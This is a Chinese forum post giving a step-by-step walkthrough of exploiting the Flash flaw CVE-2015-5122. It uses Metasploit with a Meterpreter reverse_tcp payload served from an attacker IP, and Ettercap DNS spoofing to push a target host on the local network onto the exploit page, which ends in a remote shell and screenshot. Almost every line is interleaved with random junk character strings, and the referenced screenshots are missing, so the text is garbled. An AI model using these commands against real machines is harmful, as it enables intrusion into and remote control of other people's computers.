cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

2 m, l# g, o n3 k 二、cve2015-5122漏洞实例演示虚拟机 ( W' E! l, l; y, o6 W: E' d

* V1 ]" G3 T6 w 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： + H& U0 g' f6 h

6 \$ t' u6 F- | search cve-2015-5122如图： , ]1 f2 g4 H3 s+ D3 B9 z

0 l1 |. D+ T" e/ W8 g ` + G Y6 y; u) Z& z+ {' s

- G' n, C J7 L& b 下面我们敲如下命令： 5 Z% A7 w& `" ^3 R! u% U

! s& S, H. s. ?: X- _( d7 k1 ^# | use exploit/multi/browser/adobe_flash_opaque_background_uaf 5 e0 b5 }3 d$ |$ O/ K6 c& P

; K0 a! L3 u e o set PAYLOAD windows/meterpreter/reverse_tcp - h0 m' c0 V& p5 ], R

* e7 A& N1 w8 g, v" S7 y7 y5 S, ~ set LHOST 192.168.0.109 5 D; k% Y+ Z* m

$ u. o Z0 g; c9 C" F/ h set URIPATH / /*根目录*/ 2 K9 C n% n0 y, J1 k7 T$ U

3 \* ~7 g$ z. a* {* u' x* Z set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 + R1 ]) |* V, b. }" l$ `

& x8 K1 o& ^* W# F, G set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 % E6 F( I( ]( a, M E6 a

# p# ^- [: @6 _, G9 t 然后show options如图： 7 |! s i g" {& B) w ~# ^! O

+ o2 ~9 F& H' p9 u9 L; Z . P5 W6 b) ?- d9 w6 e

" }& {$ a; l- T& r1 N( Y8 A 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
2 p* y( W- G: C. m A* B( n ( d+ o- P9 k) s/ M

6 [9 |7 Y* F/ b/ w5 I! S% Q. g6 N 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 : ?: Q) p/ M9 x; s6 S& Y- z4 m

0 J$ o6 K" } Z7 g J. k* M0 c Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf W3 A! v1 }! K: H2 u9 {

8 p2 X6 g k1 |/ _ # X3 @ a' ?% m5 M. K Q

; B, O# s1 }% M' I1 [. | 成功了，这时候我们断开ettercap，如图： ; F9 @$ w8 u; `% h% O

/ o- N0 ?; v7 @$ U2 o. ^; M! w ) }: m/ U" p1 h7 z3 Z

$ n& a; F" |/ c3 F/ V6 t/ O( n X7 m Screenshot如图： . V$ [# r& D4 r7 v

: h9 }4 Y5 {6 {$ y & ^9 W C V+ W4 H# N

1 h* q& Q/ @2 W/ x" `# Y# | 6 @6 }8 x' e7 X$ I

		自动登录	找回密码
密码			立即注册